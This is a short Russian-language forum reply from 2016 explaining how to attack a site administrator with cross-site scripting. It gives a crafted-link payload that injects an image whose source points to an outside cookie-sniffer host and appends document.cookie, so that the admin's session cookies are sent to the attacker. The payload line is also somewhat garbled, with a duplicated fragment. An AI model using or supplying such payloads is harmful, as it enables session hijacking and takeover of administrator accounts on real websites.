Показать сообщение отдельно

  #6  
Старый 24.12.2016, 15:29
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

Dosia сказал(а):

А можно поподробнее о xss на админа? Или ссылку на тему )

Это значит, что будет сформированна специальная ссылка, которую надо будет дать админую.
Можно подлкючить сниффер куки ---> site.com/post.php?p='>img=new Image();img.src="http://xsssniffer.com/sniff.gif?"+document.cookie;"+document.cookie;

Почитать - тема очень обширная. Первым делом, следует проверить, а есть ли на ренсурсе та самая XSS (на себе в браузере). В вики есть статья

После прочтения уже будет более ясно, каким образом это использовать.
 
Ответить с цитированием